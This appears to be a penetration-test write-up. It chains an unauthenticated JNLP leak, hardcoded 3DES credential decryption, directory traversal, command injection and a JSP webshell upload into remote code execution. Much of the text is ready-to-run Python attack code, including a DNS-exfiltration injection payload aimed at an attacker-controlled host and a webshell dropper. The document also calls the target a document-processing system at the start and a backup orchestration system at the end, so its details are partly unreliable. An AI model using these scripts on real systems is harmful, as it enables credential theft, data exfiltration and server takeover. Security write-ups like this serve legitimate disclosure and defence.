Keeping secrets safe inside applications has always felt like an endless game of cat and mouse – especially when it comes to desktop software. During a recent penetration test I stumbled into a chain that began with a JNLP file and ended with remote code execution against the system that orchestrated document-processing campaigns.
The root cause? A string of “small” design shortcuts that, when chained together, removed every meaningful layer of defense.
Step 1: Finding the JNLP file
A client-side workflow tool generated a fresh JNLP file every time a user modified a scenario graph. Those files were served from a predictable path on the web server without any authentication – an attacker only needed to guess the filename pattern.

The file exposed much more than UI metadata. It contained paths to XML definitions, the username used by the client, the base API URLs that controlled every scenario, two encrypted strings with API credentials and, most importantly, the name of a companion JAR file.
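To make the discovery step concrete, here is a minimal sketch under assumed values: the host and the candidate filenames below are placeholders, not the real deployment's path pattern. Because no authentication was required, guessing the generated name was all it took.

```python
# Hypothetical recon sketch: the host and the candidate filenames are assumptions,
# not the real deployment's values. The files were served without authentication,
# so guessing the generated name is all it takes.
import requests

BASE = "https://target.example.com/webstart"

for candidate in ("editor.jnlp", "scenario.jnlp", "scenario_editor.jnlp"):
    resp = requests.get(f"{BASE}/{candidate}", timeout=10)
    if resp.ok and "<jnlp" in resp.text:
        print(f"[+] Found JNLP at {BASE}/{candidate}")
        with open("found.jnlp", "wb") as fh:
            fh.write(resp.content)
        break
```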
Step 2: Analyzing the JNLP payload
Downloading the JNLP file revealed how tightly the client was coupled to backend secrets. The configuration listed the exact location of the JAR that implemented the visual editor.


Armed with the JAR path, the next step was obvious: download the binary and peel back its layers.
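That extraction can be sketched roughly like this. The element layout follows the standard JNLP format, but the parameter names and file names here are assumptions rather than the product's real ones.

```python
# Pull the interesting fields out of the downloaded JNLP and fetch the companion
# JAR for offline analysis. The element layout follows the standard JNLP format;
# the parameter names and file names will differ in a real deployment.
from urllib.parse import urljoin
import xml.etree.ElementTree as ET
import requests

root = ET.parse("found.jnlp").getroot()
codebase = root.get("codebase")

# The companion JAR implementing the visual editor.
jar_href = root.find(".//resources/jar").get("href")

# Applet parameters carried the operational metadata: username, API base URLs
# and the two encrypted credential strings.
params = {p.get("name"): p.get("value") for p in root.iter("param")}
print("jar:", jar_href)
for name, value in params.items():
    print(f"  {name} = {value}")

# Grab the JAR; any Java decompiler (CFR, Procyon, JADX) then exposes
# ACCApplet and CryptionText for review.
with open("editor.jar", "wb") as fh:
    fh.write(requests.get(urljoin(codebase, jar_href), timeout=30).content)
```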
Step 3: Reverse-engineering the JAR
Decompiler work quickly uncovered the ACCApplet class handling startup logic and the CryptionText helper responsible for decrypting API credentials.


The application relied on DESede (3DES) with a hardcoded key stored as a hexadecimal constant.

Combining the key with the encrypted strings from the JNLP produced reusable API credentials – the same ones used across the entire deployment.
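A minimal reimplementation of the decryption looks like the sketch below. The key is a placeholder, and the ECB mode, PKCS#5 padding and base64 encoding are assumptions about how a helper like CryptionText typically works; substitute whatever the decompiled code actually uses.

```python
# Minimal sketch of recovering the API credentials, mirroring what the decompiled
# CryptionText helper does. The key, the ECB mode, the PKCS#5 padding and the
# base64 encoding are assumptions for illustration.
import base64
from Crypto.Cipher import DES3            # pip install pycryptodome
from Crypto.Util.Padding import unpad

HARDCODED_KEY_HEX = "00112233445566778899aabbccddeeff0011223344556677"  # placeholder, not the real constant

def decrypt_credential(ciphertext_b64: str) -> str:
    key = bytes.fromhex(HARDCODED_KEY_HEX)
    cipher = DES3.new(key, DES3.MODE_ECB)
    plaintext = unpad(cipher.decrypt(base64.b64decode(ciphertext_b64)), DES3.block_size)
    return plaintext.decode("utf-8")

# Feed in the two encrypted strings lifted straight from the JNLP file:
# api_user = decrypt_credential("<first encrypted blob from the JNLP>")
# api_pass = decrypt_credential("<second encrypted blob from the JNLP>")
```

Because the key ships inside the JAR, every installation built from the same code shares it, which is exactly why the recovered credentials worked across the whole deployment.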

Step 4: Reproducing API requests
The JAR also held a list of REST endpoints used by the client. With the decrypted credentials, I could impersonate the legitimate editor and replay every privileged API call.

I started with reconnaissance. Directory traversal worked out of the box; ../ sequences were never normalized.
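Something like the following was enough to confirm it. The endpoint, the parameter name and the Basic-auth scheme are illustrative assumptions, not the product's actual API.

```python
# Replaying the client's REST calls with the recovered credentials and probing
# for path traversal. The endpoint, parameter name and Basic-auth scheme are
# illustrative assumptions, not the product's real API.
import base64
import http.client

HOST = "target.example.com"
auth = base64.b64encode(b"api_user:api_pass").decode()   # placeholders for the decrypted credentials

# http.client sends the request target exactly as given, so nothing rewrites
# the ../ sequences on the way out; the server never normalized them either.
conn = http.client.HTTPSConnection(HOST, timeout=10)
conn.request(
    "GET",
    "/api/v1/getfile?path=../../../../etc/passwd",        # hypothetical endpoint
    headers={"Authorization": f"Basic {auth}"},
)
resp = conn.getresponse()
print(resp.status)
print(resp.read().decode(errors="replace"))
```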


Step 5: Happy hunting
The deeper I went, the clearer it became that the API placed complete trust in data an attacker fully controlled:
- Reading /proc/self/environ leaked environment variables because the application piped the command through gzip and returned the raw output.
- Executing shell commands was possible through parameters that were never sanitized.


That behaviour opened the door to command injection and DNS-based exfiltration even in environments with outbound traffic restrictions.
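A sketch of that pattern, with hypothetical endpoint and parameter names: the injected command hex-encodes its output and leaks it one DNS lookup at a time to a domain the attacker controls.

```python
# Illustrative command-injection probe with DNS-based exfiltration. The endpoint
# and parameter names are assumptions; the technique is the point: any
# unsanitized parameter that reaches a shell lets output leak through DNS
# lookups to an attacker-controlled domain, even when direct egress is blocked.
import base64
import http.client
import urllib.parse

HOST = "target.example.com"
ATTACKER_DOMAIN = "collab.attacker.example"              # e.g. a Burp Collaborator or interactsh host
auth = base64.b64encode(b"api_user:api_pass").decode()   # placeholders for the decrypted credentials

# Run `id`, hex-encode the output and smuggle it out as a single DNS label.
payload = f"; nslookup $(id | od -An -tx1 | tr -d ' \\n' | head -c 60).{ATTACKER_DOMAIN}"

conn = http.client.HTTPSConnection(HOST, timeout=10)
conn.request(
    "GET",
    "/api/v1/runtask?name=" + urllib.parse.quote(payload),   # hypothetical vulnerable parameter
    headers={"Authorization": f"Basic {auth}"},
)
print(conn.getresponse().status)
```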

Attackers could also upload arbitrary files via the putfile endpoint. With another traversal, that turned into a reliable webshell dropper inside the Tomcat webroot.
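Sketched out with assumed parameter names and an assumed Tomcat layout, that chain looks roughly like this; only the putfile endpoint name comes from the engagement, everything else is illustrative.

```python
# Abuse the putfile endpoint: combine the arbitrary-file upload with another
# traversal to land a JSP webshell inside the Tomcat webroot. The parameter
# names and the webroot path are assumptions about the deployment.
import base64
import requests

BASE = "https://target.example.com"
auth = base64.b64encode(b"api_user:api_pass").decode()   # placeholders for the decrypted credentials

JSP_SHELL = (
    '<%@ page import="java.io.*" %>'
    '<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));'
    '   BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));'
    '   String l; while ((l = r.readLine()) != null) { out.println(l); } %>'
)

resp = requests.post(
    f"{BASE}/api/v1/putfile",
    params={"path": "../../webapps/ROOT/sh.jsp"},        # hypothetical traversal into the webroot
    data=JSP_SHELL,
    headers={"Authorization": f"Basic {auth}"},
    timeout=10,
)
print(resp.status_code)

# If it lands, command execution is one request away:
#   GET https://target.example.com/sh.jsp?cmd=id
```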


Conclusion: From secrets to system compromise
One “small” shortcut stacked on top of another until the entire security model collapsed:
- Exposed JNLP files leaked operational metadata without authentication.
- Hardcoded DESede keys made “encrypted” credentials meaningless.
- API endpoints trusted attacker-controlled input, enabling directory traversal and command injection.
- System commands executed with user-controlled parameters, turning the platform into an RCE factory.

What started as an innocuous configuration leak became a complete takeover of the backup orchestration system. Secrets deserve the same threat modelling as any other critical component – because once the door is open, attackers will never stop at a single credential.




